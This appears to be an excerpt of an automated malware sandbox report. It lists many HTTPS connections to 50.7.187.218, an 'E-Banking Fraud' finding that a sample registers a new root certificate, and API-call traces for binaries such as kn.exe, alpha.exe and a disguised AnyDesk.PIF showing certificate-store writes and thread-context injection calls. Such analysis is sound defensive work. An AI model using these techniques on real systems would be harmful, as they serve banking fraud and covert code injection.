      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49755 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49761 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49763 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49773 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49775 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49781 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49785 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49789 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49796 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49803 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49810 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49817 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49824 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49831 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49838 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49845 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49852 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49859 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49866 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49870 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49876 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49881 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49887 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49894 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49900 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49907 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49914 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49921 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49928 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49935 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49942 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49949 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49955 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49962 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49969 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49976 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49983 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49990 version: TLS 1.2

      E-Banking Fraud

      barindex
      Registers a new ROOT certificate
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5660BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore,6_2_00007FF67C5660BC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF67C4DF9B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF67C4EFC20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5898B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF67C5898B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF67C54184C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5893A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF67C5893A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C55342C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586EA8 NCryptImportKey,#360,6_2_00007FF67C586EA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550EF4 NCryptImportKey,#205,#359,#359,#357,6_2_00007FF67C550EF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C540F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,6_2_00007FF67C540F58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5129A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF67C5129A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,6_2_00007FF67C53EA7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5125E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,6_2_00007FF67C5125E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF67C58A740
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF67C54E1F8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC89E4 NtQueryInformationToken,NtQueryInformationToken,3_2_00007FF7E1DC89E4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,3_2_00007FF7E1DB3D94
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC898C NtQueryInformationToken,3_2_00007FF7E1DC898C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,3_2_00007FF7E1DE1538
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,3_2_00007FF7E1DC8114
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,3_2_00007FF7E1DDBCF0
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,3_2_00007FF7E1DC88C0
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,3_2_00007FF7E1DC7FF8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC89E4 NtQueryInformationToken,NtQueryInformationToken,5_2_00007FF7E1DC89E4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,5_2_00007FF7E1DB3D94
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC898C NtQueryInformationToken,5_2_00007FF7E1DC898C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,5_2_00007FF7E1DE1538
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,5_2_00007FF7E1DC8114
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,5_2_00007FF7E1DDBCF0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,5_2_00007FF7E1DC88C0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,5_2_00007FF7E1DC7FF8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5AC964 NtQuerySystemTime,RtlTimeToSecondsSince1970,6_2_00007FF67C5AC964
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,9_2_02B7DD70
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B77D78 NtWriteVirtualMemory,9_2_02B77D78
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_02B7DBB0
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,9_2_02B7DC8C
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_02B7DC04
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B78D70 GetThreadContext,SetThreadContext,NtResumeThread,9_2_02B78D70
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B78D6E GetThreadContext,SetThreadContext,NtResumeThread,9_2_02B78D6E
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,10_2_00007FF7E1DC8114
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,10_2_00007FF7E1DC7FF8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC89E4 NtQueryInformationToken,NtQueryInformationToken,10_2_00007FF7E1DC89E4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,10_2_00007FF7E1DB3D94
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC898C NtQueryInformationToken,10_2_00007FF7E1DC898C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,10_2_00007FF7E1DE1538
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,10_2_00007FF7E1DDBCF0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,10_2_00007FF7E1DC88C0
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,3_2_00007FF7E1DB5240
